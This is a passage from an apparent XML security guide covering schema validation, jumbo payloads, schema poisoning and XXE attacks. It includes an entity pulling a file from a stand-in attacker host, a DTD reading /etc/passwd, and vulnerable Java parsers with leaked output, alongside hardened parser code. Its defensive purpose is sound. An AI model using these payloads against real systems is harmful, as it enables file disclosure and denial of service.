Certain elements or attributes may follow a specific syntax. You can add &amp;lt;tt&amp;gt;pattern&amp;lt;/tt&amp;gt; restrictions when using XML schemas. When you want to ensure that the data complies with a specific pattern, you can create a specific definition for it. Social security numbers (SSN) may serve as a good example; they must use a specific set of characters, a specific length, and a specific &amp;lt;tt&amp;gt;pattern&amp;lt;/tt&amp;gt;:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;SSN&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:token&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''pattern''' value=&amp;quot;[0-9]{3}-[0-9]{2}-[0-9]{4}&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Only values between &amp;lt;tt&amp;gt;000-00-0000&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;999-99-9999&amp;lt;/tt&amp;gt; will be allowed for an SSN.&lt;br /&gt;
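&lt;br /&gt;
The same expression can be checked outside a schema. This minimal Python sketch assumes the standard &amp;lt;tt&amp;gt;re&amp;lt;/tt&amp;gt; module; the name &amp;lt;tt&amp;gt;is_valid_ssn&amp;lt;/tt&amp;gt; is hypothetical. Unlike the &amp;lt;tt&amp;gt;token&amp;lt;/tt&amp;gt; base type, it does not collapse surrounding white space before matching:&lt;br /&gt;

```python
import re

# Same expression as the xs:pattern facet; fullmatch anchors it at both
# ends, which is how XML Schema applies patterns.
SSN_PATTERN = re.compile(r"[0-9]{3}-[0-9]{2}-[0-9]{4}")


def is_valid_ssn(value: str) -> bool:
    """Return True when the whole value matches the SSN pattern."""
    return SSN_PATTERN.fullmatch(value) is not None


print(is_valid_ssn("123-45-6789"))    # True
print(is_valid_ssn("123-45-67890"))   # False
```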
&lt;br /&gt;
==== Assertions ====&lt;br /&gt;
Assertion components constrain the existence and values of related elements and attributes on XML schemas. An element or attribute will be considered valid with regard to an assertion only if the test evaluates to true without raising any error. The variable &amp;lt;tt&amp;gt;$value&amp;lt;/tt&amp;gt; can be used to reference the contents of the value being analyzed. &lt;br /&gt;
The ''Divide by Zero'' section above referenced the potential consequences of using data types containing the zero value for denominators, proposing a data type containing only positive values. An opposite example would consider valid the entire range of numbers except zero. To avoid disclosing potential errors, values could be checked using an &amp;lt;tt&amp;gt;assertion&amp;lt;/tt&amp;gt; disallowing the number zero:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;denominator&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:integer&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''assertion''' test=&amp;quot;$value != 0&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The assertion guarantees that the &amp;lt;tt&amp;gt;denominator&amp;lt;/tt&amp;gt; will not contain the value zero as a valid number and also allows negative numbers to be a valid denominator.&lt;br /&gt;
&lt;br /&gt;
==== Occurrences ====&lt;br /&gt;
Not defining a maximum number of occurrences can expose the application to extreme numbers of items to be processed. Two attributes specify minimum and maximum limits: &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt;. The default value for both the &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; and the &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt; attributes is &amp;lt;tt&amp;gt;1&amp;lt;/tt&amp;gt;, but certain elements may require other values. For instance, if a value is optional, it could contain a &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; of 0, and if there is no limit on the maximum amount, it could contain a &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt; of &amp;lt;tt&amp;gt;unbounded&amp;lt;/tt&amp;gt;, as in the following example:&lt;br /&gt;
 &amp;lt;xs:schema xmlns:xs=&amp;quot;&amp;lt;nowiki&amp;gt;http://www.w3.org/2001/XMLSchema&amp;lt;/nowiki&amp;gt;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;operation&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;buy&amp;quot; '''maxOccurs'''=&amp;quot;'''unbounded'''&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
       &amp;lt;xs:all&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;xs:decimal&amp;quot;/&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
       &amp;lt;/xs:all&amp;gt;&lt;br /&gt;
      &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
     &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:schema&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous schema includes a root element named &amp;lt;tt&amp;gt;operation&amp;lt;/tt&amp;gt;, which can contain an unlimited (&amp;lt;tt&amp;gt;unbounded&amp;lt;/tt&amp;gt;) number of &amp;lt;tt&amp;gt;buy&amp;lt;/tt&amp;gt; elements. This is a common finding, since developers do not normally want to restrict maximum numbers of occurrences. Applications using limitless occurrences should test what happens when they receive an extremely large number of elements to be processed. Since computational resources are limited, the consequences should be analyzed and eventually a maximum number ought to be used instead of an &amp;lt;tt&amp;gt;unbounded&amp;lt;/tt&amp;gt; value.&lt;br /&gt;
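&lt;br /&gt;
Where the schema cannot be changed, an application-level limit is one possible fallback. The Python sketch below is only an assumption of how that might look: &amp;lt;tt&amp;gt;MAX_BUY_ELEMENTS&amp;lt;/tt&amp;gt;, &amp;lt;tt&amp;gt;count_buy_elements&amp;lt;/tt&amp;gt;, and &amp;lt;tt&amp;gt;build_operation&amp;lt;/tt&amp;gt; are hypothetical names, and the limit of 100 is arbitrary:&lt;br /&gt;

```python
import xml.etree.ElementTree as ET

MAX_BUY_ELEMENTS = 100  # hypothetical limit; choose one that suits the application


def count_buy_elements(operation: ET.Element, limit: int = MAX_BUY_ELEMENTS) -> int:
    """Return the number of buy children, or raise if it exceeds the limit."""
    count = len(operation.findall("buy"))
    if count > limit:
        raise ValueError(f"{count} buy elements exceed the limit of {limit}")
    return count


def build_operation(purchases: int) -> ET.Element:
    """Build an operation element with the given number of empty buy children."""
    operation = ET.Element("operation")
    for _ in range(purchases):
        ET.SubElement(operation, "buy")
    return operation


print(count_buy_elements(build_operation(3)))   # 3
```

This check runs after parsing, so the parser has already spent memory on the whole document. A bounded &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt; in the schema states the same limit declaratively.&lt;br /&gt;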
&lt;br /&gt;
== Jumbo Payloads ==&lt;br /&gt;
Sending an XML document of 1GB requires only a second of server processing and might not be worth consideration as an attack. Instead, an attacker would look for a way to minimize the CPU and traffic used to generate this type of attack, compared to the overall amount of server CPU or traffic used to handle the requests.&lt;br /&gt;
&lt;br /&gt;
=== Traditional Jumbo Payloads ===&lt;br /&gt;
There are two primary methods to make a document larger than normal:&lt;br /&gt;
* Depth attack: using a huge number of elements, element names, and/or element values.&lt;br /&gt;
* Width attack: using a huge number of attributes, attribute names, and/or attribute values.&lt;br /&gt;
In most cases, the overall result will be a huge document. This is a short example of what this looks like:&lt;br /&gt;
 &amp;lt;soapenv:Envelope xmlns:soapenv=&amp;quot;&amp;lt;nowiki&amp;gt;http://schemas.xmlsoap.org/soap/envelope/&amp;lt;/nowiki&amp;gt;&amp;quot; xmlns:ext=&amp;quot;&amp;lt;nowiki&amp;gt;http://com/ibm/was/wssample/sei/echo/b2b/external&amp;lt;/nowiki&amp;gt;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;soapenv:Header '''LARGENAME1'''=&amp;quot;'''LARGEVALUE1'''&amp;quot; '''LARGENAME2'''=&amp;quot;'''LARGEVALUE2'''&amp;quot; '''LARGENAME3'''=&amp;quot;'''LARGEVALUE3'''&amp;quot; …&amp;gt;&lt;br /&gt;
  ...&lt;br /&gt;
&lt;br /&gt;
=== &amp;quot;Small&amp;quot; Jumbo Payloads ===&lt;br /&gt;
The following example is a very small document, but the results of processing this could be similar to those of processing traditional jumbo payloads. The purpose of such a small payload is that it allows an attacker to send many documents fast enough to make the application consume most or all of the available resources:&lt;br /&gt;
 &amp;lt;?xml version=&amp;quot;1.0&amp;quot;?&amp;gt;&lt;br /&gt;
 &amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ENTITY '''file''' SYSTEM &amp;quot;'''&amp;lt;nowiki&amp;gt;http://attacker/huge.xml&amp;lt;/nowiki&amp;gt;'''&amp;quot; &amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;root&amp;gt;'''&amp;amp;file;'''&amp;lt;/root&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Schema Poisoning ==&lt;br /&gt;
When an attacker is capable of introducing modifications to a schema, there could be multiple high-risk consequences. In particular, the effect of these consequences will be more dangerous if the schemas are using DTD (e.g., file retrieval, denial of service). An attacker could exploit this type of vulnerability in numerous scenarios, always depending on the location of the schema. &lt;br /&gt;
&lt;br /&gt;
=== Local Schema Poisoning ===&lt;br /&gt;
Local schema poisoning happens when schemas are available on the same host, whether or not the schemas are embedded in the same XML document.&lt;br /&gt;
&lt;br /&gt;
==== Embedded Schema ====&lt;br /&gt;
The most trivial type of schema poisoning takes place when the schema is defined within the same XML document. Consider the following unknowingly vulnerable example provided by the W3C:&lt;br /&gt;
 &amp;lt;?xml version=&amp;quot;1.0&amp;quot;?&amp;gt;&lt;br /&gt;
 &amp;lt;!DOCTYPE note [&lt;br /&gt;
  &amp;lt;!ELEMENT note (to,from,heading,body)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT to (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT from (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT heading (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT body (#PCDATA)&amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
 &amp;lt;/note&amp;gt;&lt;br /&gt;
&lt;br /&gt;
All restrictions on the &amp;lt;tt&amp;gt;note&amp;lt;/tt&amp;gt; element could be removed or altered, allowing any type of data to be sent to the server. Furthermore, if the server processes external entities, the attacker could use the schema to, for example, read files stored on the server. This type of schema only serves as a suggestion for how to structure a document; to be used safely, the application needs a way to check the integrity of the embedded schema.&lt;br /&gt;
Attacks through embedded schemas are commonly used to exploit external entity expansions. Embedded XML schemas can also assist in port scans of internal hosts or brute force attacks.&lt;br /&gt;
&lt;br /&gt;
==== Incorrect Permissions ====&lt;br /&gt;
You can often circumvent the risk of using remotely tampered versions by processing a local schema. &lt;br /&gt;
 &amp;lt;!DOCTYPE note SYSTEM &amp;quot;'''note.dtd'''&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
 &amp;lt;/note&amp;gt;&lt;br /&gt;
&lt;br /&gt;
However, if the local schema does not contain the correct permissions, an internal attacker could alter the original restrictions. The following line exemplifies a schema using permissions that allow any user to make modifications:&lt;br /&gt;
 -rw-rw-'''rw-'''  1 user  staff  743 Jan 15 12:32 '''note.dtd'''&lt;br /&gt;
&lt;br /&gt;
The permissions set on &amp;lt;tt&amp;gt;note.dtd&amp;lt;/tt&amp;gt; allow any user on the system to modify it. This vulnerability is not related to the structure of an XML document or a schema, but since these documents are commonly stored in the filesystem, it is worth mentioning that an attacker could exploit this type of problem.&lt;br /&gt;
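&lt;br /&gt;
A deployment check can flag schema files that are writable by every user. The following is a minimal sketch that assumes a POSIX filesystem (on other filesystems the call throws &amp;lt;tt&amp;gt;UnsupportedOperationException&amp;lt;/tt&amp;gt;); &amp;lt;tt&amp;gt;SchemaPermissionCheck&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;isWorldWritable&amp;lt;/tt&amp;gt; are hypothetical names.&lt;br /&gt;

```java
import java.io.IOException;
import java.nio.file.Files;
import java.nio.file.Path;
import java.nio.file.attribute.PosixFilePermission;

// Hypothetical helper: reports schema files that any local user could modify.
class SchemaPermissionCheck {
  // Returns true when the "others" write bit is set, as in -rw-rw-rw-.
  static boolean isWorldWritable(Path schema) throws IOException {
    return Files.getPosixFilePermissions(schema).contains(PosixFilePermission.OTHERS_WRITE);
  }
}
```

A stricter variant could also test &amp;lt;tt&amp;gt;PosixFilePermission.GROUP_WRITE&amp;lt;/tt&amp;gt;, depending on who belongs to the file's group.&lt;br /&gt;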
&lt;br /&gt;
=== Remote Schema Poisoning ===&lt;br /&gt;
Schemas defined by external organizations are normally referenced remotely. If capable of diverting or accessing the network’s traffic, an attacker could cause a victim to fetch a distinct type of content rather than the one originally intended. &lt;br /&gt;
&lt;br /&gt;
==== Man-in-the-Middle (MitM) Attack ====&lt;br /&gt;
When documents reference remote schemas using the unencrypted Hypertext Transfer Protocol (HTTP), the communication is performed in plain text, so an attacker in a position to intercept the connection could read and modify the schema before it reaches the end user:&lt;br /&gt;
 &amp;lt;!DOCTYPE note SYSTEM &amp;quot;'''http'''://example.com/note.dtd&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
 &amp;lt;/note&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The remote file &amp;lt;tt&amp;gt;note.dtd&amp;lt;/tt&amp;gt; could be susceptible to tampering when transmitted using the unencrypted HTTP protocol. One tool available to facilitate this type of attack is mitmproxy.&lt;br /&gt;
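&lt;br /&gt;
One way to reduce this exposure is to refuse any external resource that is not referenced over HTTPS. The following is a minimal sketch that assumes the JDK's built-in JAXP parser; &amp;lt;tt&amp;gt;HttpsOnlySchemaParser&amp;lt;/tt&amp;gt; is a hypothetical name. As written, it also rejects schemas stored in local files, which may or may not be desired.&lt;br /&gt;

```java
import java.io.InputStream;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import org.w3c.dom.Document;
import org.xml.sax.SAXException;

// Hypothetical helper: parses a document but blocks non-HTTPS external resources.
class HttpsOnlySchemaParser {
  static Document parse(InputStream xml) throws Exception {
    DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
    DocumentBuilder builder = factory.newDocumentBuilder();
    // The resolver is consulted before the parser opens an external DTD or entity.
    builder.setEntityResolver((publicId, systemId) -> {
      if (systemId == null || !systemId.startsWith("https://")) {
        throw new SAXException("Refusing to load a non-HTTPS resource: " + systemId);
      }
      return null; // null lets the parser open the HTTPS URL itself
    });
    return builder.parse(xml);
  }
}
```

The check runs before any connection is opened, so a document that points to an &amp;lt;tt&amp;gt;http&amp;lt;/tt&amp;gt; location is rejected without fetching it.&lt;br /&gt;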
&lt;br /&gt;
==== DNS-Cache Poisoning ====&lt;br /&gt;
Remote schema poisoning may also be possible even when using encrypted protocols like Hypertext Transfer Protocol Secure (HTTPS). When software performs reverse Domain Name System (DNS) resolution on an IP address to obtain the hostname, it may not properly ensure that the IP address is truly associated with the hostname. In this case, the software enables an attacker to redirect content to their own Internet Protocol (IP) addresses.&lt;br /&gt;
The previous example referenced the host example.com using an unencrypted protocol. When switching to HTTPS, the location of the remote schema will look like https://example.com/note.dtd. In a normal scenario, example.com resolves to the IP address 1.1.1.1:&lt;br /&gt;
 $ host example.com&lt;br /&gt;
 example.com has address 1.1.1.1&lt;br /&gt;
&lt;br /&gt;
If an attacker compromises the DNS being used, the previous hostname could now point to a new, different IP controlled by the attacker (2.2.2.2):&lt;br /&gt;
 $ host example.com&lt;br /&gt;
 example.com has address '''2.2.2.2'''&lt;br /&gt;
&lt;br /&gt;
When accessing the remote file, the victim may be actually retrieving the contents of a location controlled by an attacker.&lt;br /&gt;
&lt;br /&gt;
==== Evil Employee Attack ====&lt;br /&gt;
When third parties host and define schemas, the contents are not under the control of the schemas’ users. Any modifications introduced by a malicious employee—or an external attacker in control of these files—could impact all users processing the schemas. Subsequently, attackers could affect the confidentiality, integrity, or availability of other services (especially if the schema in use is DTD).  &lt;br /&gt;
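&lt;br /&gt;
When a schema hosted by a third party has to be used, one option is to pin the digest of a reviewed copy and compare it before every use. The following is a minimal sketch; &amp;lt;tt&amp;gt;SchemaDigest&amp;lt;/tt&amp;gt; and its method names are hypothetical, and how the pinned value is stored and distributed is left to the application.&lt;br /&gt;

```java
import java.nio.charset.StandardCharsets;
import java.security.MessageDigest;
import java.security.NoSuchAlgorithmException;

// Hypothetical helper: compares a downloaded schema against a pinned SHA-256 digest.
class SchemaDigest {
  // Returns the SHA-256 digest of the content as lowercase hexadecimal.
  static String sha256Hex(byte[] content) throws NoSuchAlgorithmException {
    byte[] hash = MessageDigest.getInstance("SHA-256").digest(content);
    StringBuilder hex = new StringBuilder();
    for (byte b : hash) {
      hex.append(String.format("%02x", b));
    }
    return hex.toString();
  }

  // Returns true only when the content hashes to the pinned value.
  static boolean matchesPinnedDigest(byte[] content, String pinnedHex)
      throws NoSuchAlgorithmException {
    return MessageDigest.isEqual(
        sha256Hex(content).getBytes(StandardCharsets.US_ASCII),
        pinnedHex.toLowerCase().getBytes(StandardCharsets.US_ASCII));
  }
}
```

With this approach, any change to the remote schema, whether malicious or legitimate, makes the comparison fail until the new version has been reviewed and re-pinned.&lt;br /&gt;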
&lt;br /&gt;
== XML Entity Expansion ==&lt;br /&gt;
If the parser uses a DTD, an attacker might inject data that may adversely affect the XML parser during document processing. These adverse effects could include the parser crashing or accessing local files.&lt;br /&gt;
&lt;br /&gt;
=== Sample Vulnerable Java Implementations === &lt;br /&gt;
By using the ability of a DTD to reference local or remote files, an attacker can affect the confidentiality of data. In addition, availability can be affected if entity expansion is not properly restricted. Consider the following example of an XML External Entity (XXE) attack.&lt;br /&gt;
&lt;br /&gt;
'''Sample XML'''&lt;br /&gt;
 &amp;lt;!DOCTYPE contacts SYSTEM &amp;quot;contacts.dtd&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;contacts&amp;gt;&lt;br /&gt;
  &amp;lt;contact&amp;gt;&lt;br /&gt;
   &amp;lt;firstname&amp;gt;John&amp;lt;/firstname&amp;gt; &lt;br /&gt;
   &amp;lt;lastname&amp;gt;'''&amp;amp;xxe;'''&amp;lt;/lastname&amp;gt;&lt;br /&gt;
  &amp;lt;/contact&amp;gt; &lt;br /&gt;
 &amp;lt;/contacts&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''Sample DTD'''&lt;br /&gt;
 &amp;lt;!ELEMENT contacts (contact*)&amp;gt;&lt;br /&gt;
 &amp;lt;!ELEMENT contact (firstname,lastname)&amp;gt;&lt;br /&gt;
 &amp;lt;!ELEMENT firstname (#PCDATA)&amp;gt;&lt;br /&gt;
 &amp;lt;!ELEMENT lastname ANY&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY xxe SYSTEM &amp;quot;'''/etc/passwd'''&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== XXE using DOM ====&lt;br /&gt;
 import java.io.IOException;&lt;br /&gt;
 import javax.xml.parsers.DocumentBuilder;&lt;br /&gt;
 import javax.xml.parsers.DocumentBuilderFactory;&lt;br /&gt;
 import javax.xml.parsers.ParserConfigurationException;&lt;br /&gt;
 import org.xml.sax.InputSource;&lt;br /&gt;
 import org.w3c.dom.Document;&lt;br /&gt;
 import org.w3c.dom.Element;&lt;br /&gt;
 import org.w3c.dom.Node;&lt;br /&gt;
 import org.w3c.dom.NodeList;&lt;br /&gt;
&lt;br /&gt;
 public class parseDocument {&lt;br /&gt;
  public static void main(String[] args) {&lt;br /&gt;
   try {&lt;br /&gt;
    DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();&lt;br /&gt;
    DocumentBuilder builder = factory.newDocumentBuilder();&lt;br /&gt;
    Document doc = builder.parse(new InputSource(&amp;quot;contacts.xml&amp;quot;));&lt;br /&gt;
    NodeList nodeLst = doc.getElementsByTagName(&amp;quot;contact&amp;quot;);&lt;br /&gt;
    for (int s = 0; s &amp;lt; nodeLst.getLength(); s++) {&lt;br /&gt;
      Node fstNode = nodeLst.item(s);&lt;br /&gt;
      if (fstNode.getNodeType() == Node.ELEMENT_NODE) {&lt;br /&gt;
        Element fstElmnt = (Element) fstNode;&lt;br /&gt;
        NodeList fstNmElmntLst = fstElmnt.getElementsByTagName(&amp;quot;firstname&amp;quot;);&lt;br /&gt;
        Element fstNmElmnt = (Element) fstNmElmntLst.item(0);&lt;br /&gt;
        NodeList fstNm = fstNmElmnt.getChildNodes();&lt;br /&gt;
        System.out.println(&amp;quot;First Name: &amp;quot;  + ((Node) fstNm.item(0)).getNodeValue());&lt;br /&gt;
        NodeList lstNmElmntLst = fstElmnt.getElementsByTagName(&amp;quot;lastname&amp;quot;);&lt;br /&gt;
        Element lstNmElmnt = (Element) lstNmElmntLst.item(0);&lt;br /&gt;
        NodeList lstNm = lstNmElmnt.getChildNodes();&lt;br /&gt;
        System.out.println(&amp;quot;Last Name: &amp;quot; + ((Node) lstNm.item(0)).getNodeValue());&lt;br /&gt;
      }&lt;br /&gt;
     }&lt;br /&gt;
   } catch (Exception e) {&lt;br /&gt;
     e.printStackTrace();&lt;br /&gt;
   }&lt;br /&gt;
  }&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
The previous code produces the following output:&lt;br /&gt;
 $ javac parseDocument.java ; java parseDocument&lt;br /&gt;
 First Name: John&lt;br /&gt;
 Last Name: '''### User Database'''&lt;br /&gt;
 '''...'''&lt;br /&gt;
 '''nobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false'''&lt;br /&gt;
 '''root:*:0:0:System Administrator:/var/root:/bin/sh'''&lt;br /&gt;
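&lt;br /&gt;
For comparison, the following sketch shows one way to configure the same DOM API so that the sample document is rejected instead of expanded. It assumes the JDK's built-in, Xerces-based parser, which recognizes the &amp;lt;tt&amp;gt;disallow-doctype-decl&amp;lt;/tt&amp;gt; feature; &amp;lt;tt&amp;gt;HardenedDomParser&amp;lt;/tt&amp;gt; is a hypothetical name.&lt;br /&gt;

```java
import java.io.InputStream;
import javax.xml.XMLConstants;
import javax.xml.parsers.DocumentBuilderFactory;
import org.w3c.dom.Document;

// Hypothetical helper: a DOM parser configured to refuse any document with a DOCTYPE.
class HardenedDomParser {
  static Document parse(InputStream xml) throws Exception {
    DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
    factory.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
    // Assumption: Xerces-specific feature; parsing fails as soon as a DOCTYPE is seen.
    factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
    factory.setXIncludeAware(false);
    factory.setExpandEntityReferences(false);
    return factory.newDocumentBuilder().parse(xml);
  }
}
```

Rejecting the DOCTYPE outright is only suitable when the application never needs DTDs; otherwise external entities have to be disabled individually.&lt;br /&gt;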
&lt;br /&gt;
==== XXE using DOM4J ====&lt;br /&gt;
 import org.dom4j.Document;&lt;br /&gt;
 import org.dom4j.DocumentException;&lt;br /&gt;
 import org.dom4j.io.SAXReader;&lt;br /&gt;
 import org.dom4j.io.OutputFormat;&lt;br /&gt;
 import org.dom4j.io.XMLWriter;&lt;br /&gt;
&lt;br /&gt;
 public class test1 {&lt;br /&gt;
  public static void main(String[] args) {&lt;br /&gt;
   Document document = null;&lt;br /&gt;
   try {&lt;br /&gt;
    SAXReader reader = new SAXReader();&lt;br /&gt;
    document = reader.read(&amp;quot;contacts.xml&amp;quot;);&lt;br /&gt;
   } catch (Exception e) {&lt;br /&gt;
    e.printStackTrace();&lt;br /&gt;
   } &lt;br /&gt;
   OutputFormat format = OutputFormat.createPrettyPrint();&lt;br /&gt;
   try {&lt;br /&gt;
    XMLWriter writer = new XMLWriter( System.out, format );&lt;br /&gt;
    writer.write( document );&lt;br /&gt;
   } catch (Exception e) {&lt;br /&gt;
    e.printStackTrace();&lt;br /&gt;
   }&lt;br /&gt;
  }&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
The previous code produces the following output:&lt;br /&gt;
 $ java test1&lt;br /&gt;
 &amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
 &amp;lt;!DOCTYPE contacts SYSTEM &amp;quot;contacts.dtd&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;contacts&amp;gt;&lt;br /&gt;
  &amp;lt;contact&amp;gt;&lt;br /&gt;
   &amp;lt;firstname&amp;gt;John&amp;lt;/firstname&amp;gt;&lt;br /&gt;
   &amp;lt;lastname&amp;gt;'''### User Database'''&lt;br /&gt;
 '''...'''&lt;br /&gt;
 '''nobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false'''&lt;br /&gt;
 '''root:*:0:0:System Administrator:/var/root:/bin/sh'''&lt;br /&gt;
&lt;br /&gt;
==== XXE using SAX ====&lt;br /&gt;
 import java.io.IOException;&lt;br /&gt;
 import javax.xml.parsers.SAXParser;&lt;br /&gt;
 import javax.xml.parsers.SAXParserFactory;&lt;br /&gt;
 import org.xml.sax.SAXException;&lt;br /&gt;
 import org.xml.sax.helpers.DefaultHandler;&lt;br /&gt;
&lt;br /&gt;
 public class parseDocument extends DefaultHandler {&lt;br /&gt;
  public static void main(String[] args) {&lt;br /&gt;
   new parseDocument();&lt;br /&gt;
  }&lt;br /&gt;
  public parseDocument() {&lt;br /&gt;
   try {&lt;br /&gt;
    SAXParserFactory factory = SAXParserFactory.newInstance();&lt;br /&gt;
    SAXParser parser = factory.newSAXParser();&lt;br /&gt;
    parser.parse(&amp;quot;contacts.xml&amp;quot;, this);&lt;br /&gt;
   } catch (Exception e) {&lt;br /&gt;
    e.printStackTrace();&lt;br /&gt;
   }&lt;br /&gt;
  }&lt;br /&gt;
  @Override&lt;br /&gt;
  public void characters(char[] ac, int i, int j) throws SAXException {&lt;br /&gt;
   String tmpValue = new String(ac, i, j);&lt;br /&gt;
   System.out.println(tmpValue);&lt;br /&gt;
  }&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
The previous code produces the following output:&lt;br /&gt;
 $ java parseDocument&lt;br /&gt;
 John&lt;br /&gt;
 '''### User Database'''&lt;br /&gt;
 '''...'''&lt;br /&gt;
 '''nobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false'''&lt;br /&gt;
 '''root:*:0:0:System Administrator:/var/root:/bin/sh'''&lt;br /&gt;
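&lt;br /&gt;
When DTDs cannot be rejected entirely, external entities can be switched off instead. The following is a minimal sketch that assumes the JDK's built-in, Xerces-based SAX parser, where these feature names are recognized; &amp;lt;tt&amp;gt;HardenedSaxParser&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;extractText&amp;lt;/tt&amp;gt; are hypothetical names.&lt;br /&gt;

```java
import java.io.InputStream;
import javax.xml.parsers.SAXParserFactory;
import org.xml.sax.helpers.DefaultHandler;

// Hypothetical helper: collects character data without resolving external entities.
class HardenedSaxParser {
  static String extractText(InputStream xml) throws Exception {
    SAXParserFactory factory = SAXParserFactory.newInstance();
    // Standard SAX feature names: do not fetch external general or parameter entities.
    factory.setFeature("http://xml.org/sax/features/external-general-entities", false);
    factory.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
    // Assumption: Xerces-specific feature that stops the external DTD from being loaded.
    factory.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
    StringBuilder text = new StringBuilder();
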